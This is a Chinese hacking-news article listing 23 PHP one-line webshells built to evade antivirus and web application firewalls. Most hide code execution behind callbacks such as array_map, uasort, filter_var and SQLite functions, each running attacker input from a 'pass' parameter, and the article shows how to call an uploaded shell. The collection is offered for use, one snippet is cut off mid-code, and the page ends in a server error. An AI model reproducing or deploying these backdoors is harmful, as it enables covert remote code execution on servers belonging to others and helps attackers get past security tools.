最新型23个免杀过狗一句话木马

华盟君华盟君 安全资讯,最新资讯,黑客技术 8年前
4.01W 0
华盟原创文章投稿奖励计划

最新型23个免杀过狗一句话木马

 

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:

http:// target/shell.php?e=assert 密码pass

以下是代码片段:

01
$e = $_REQUEST[‘e’];
$arr = array($_POST[‘pass’],);
array_filter($arr, $e);

02

$e = $_REQUEST[‘e’];
$arr = array($_POST[‘pass’],);
array_map($e, $arr);

03

$e = $_REQUEST[‘e’];
$arr = array(‘test’, $_REQUEST[‘pass’]);
uasort($arr, $e);

04

$e = $_REQUEST[‘e’];
$arr = array(‘test’ => 1, $_REQUEST[‘pass’] => 2);
uksort($arr, $e);

05

$arr = new ArrayObject(array(‘test’, $_REQUEST[‘pass’]));
$arr->uasort(‘assert’);

06

$arr = new ArrayObject(array(‘test’ => 1, $_REQUEST[‘pass’] => 2));
$arr->uksort(‘assert’);

07

$e = $_REQUEST[‘e’];
$arr = array(1);
array_reduce($arr, $e, $_POST[‘pass’]);

08

$e = $_REQUEST[‘e’];
$arr = array($_POST[‘pass’]);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);

09

$e = $_REQUEST[‘e’];
$arr = array($_POST[‘pass’] => ‘|.*|e’,);
array_walk($arr, $e, ”);

10

$e = $_REQUEST[‘e’];
$arr = array($_POST[‘pass’] => ‘|.*|e’,);
array_walk_recursive($arr, $e, ”);

11

mb_ereg_replace(‘.*’, $_REQUEST[‘pass’], ”, ‘e’);

12

echo preg_filter(‘|.*|e’, $_REQUEST[‘pass’], ”);

13

ob_start(‘assert’);
echo $_REQUEST[‘pass’];
ob_end_flush();

14

$e = $_REQUEST[‘e’];
register_shutdown_function($e, $_REQUEST[‘pass’]);

15

$e = $_REQUEST[‘e’];
declare(ticks=1);
register_tick_function($e, $_REQUEST[‘pass’]);

16

filter_var($_REQUEST[‘pass’], FILTER_CALLBACK, array(‘options’ => ‘assert’));

17

filter_var_array(array(‘test’ => $_REQUEST[‘pass’]), array(‘test’ => array(‘filter’ => FILTER_CALLBACK, ‘options’ => ‘assert’)));

18

$e = $_REQUEST[‘e’];
$db = new PDO(‘sqlite:sqlite.db3′);
$db->sqliteCreateFunction(‘myfunc’, $e, 1);
$sth = $db->prepare(“SELECT myfunc(:exec)”);
$sth->execute(array(‘:exec’ => $_REQUEST[‘pass’]));

19

$e = $_REQUEST[‘e’];
$db = new SQLite3(‘sqlite.db3′);
$db->createFunction(‘myfunc’, $e);
$stmt = $db->prepare(“SELECT myfunc(?)”);
$stmt->bindValue(1, $_REQUEST[‘pass’], SQLITE3_TEXT);
$stmt->execute();

20

$str = urlencode($_REQUEST[‘pass’]);
$yaml = << ‘preg_replace’));

21

$mem = new Memcache();
$re = $mem->addServer(‘localhost’, 11211, TRUE, 100, 0, -1, TRUE, create_function(‘$a,$b,$c,$d,$e’, ‘return assert($a);’));
$mem->connect($_REQUEST[‘pass’], 11211, 0);

22

preg_replace_callback(‘/.+/i’, create_function(‘$arr’, ‘return assert($arr[0]);’), $_REQUEST[‘pass’]);

23

mb_ereg_replace_callback(‘.+’, create_function(‘$arr’, ‘return assert($arr[0]);’), $_REQUEST[‘pass’]);

原文地址:https://hack.77169.com/201507/205435.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/21918.html
华盟君官方
华盟君

3.40K篇文章
Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 36864 bytes) in /data/wwwroot/www.77169.net/wp-includes/wp-db.php on line 2022